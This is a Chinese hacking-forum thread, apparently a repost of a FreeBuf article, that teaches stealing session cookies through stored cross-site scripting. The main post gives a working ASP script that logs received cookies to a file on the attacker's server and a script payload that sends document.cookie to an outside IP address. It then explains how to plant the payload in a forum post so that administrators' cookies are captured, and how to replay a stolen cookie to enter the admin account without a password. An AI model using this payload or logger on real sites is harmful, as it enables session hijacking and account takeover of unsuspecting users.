查看: 2615|回复: 2

XSS获取cookie并利用

[复制链接]
  • TA的每日心情
    开心
    2015-5-31 21:29
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2013-2-26 22:56:29 | 显示全部楼层 |阅读模式
    获取cookie利用代码cookie.asp
    <html>
    <title>xx</title>
    <body>
    <%testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中
    msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值
    set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象
    set thisfile = fs.OpenTextFile(testfile,8,True,0)
    thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie
    thisfile.close()   //关闭
    set fs = nothing%>
    </body>
    </html>
    把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。 XSS构造语句
    <script>window.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)</script> 把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到http://10.65.20.196:8080/cookie.asp?msg=’+document.cookie的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。 简单步骤如下: 1、在存在漏洞的论坛中发日志: 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:3、这是没有账户前的登陆界面:4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据:5、替换cookie后不用输用户名密码就顺利进入管理员账户了:

    如文中未特别声明转载请注明出自: FreebuF.COM

    图文链接  http://www.freebuf.com/articles/web/6204.html
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2017-8-16 03:52
  • 签到天数: 13 天

    [LV.3]偶尔看看II

    发表于 2014-2-1 05:08:44 | 显示全部楼层
    好吧。。沙发
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2015-11-28 20:07
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-5-18 20:24:03 | 显示全部楼层
    回复的人好少的样子 马克
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-29 03:08 , Processed in 0.017436 second(s), 10 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部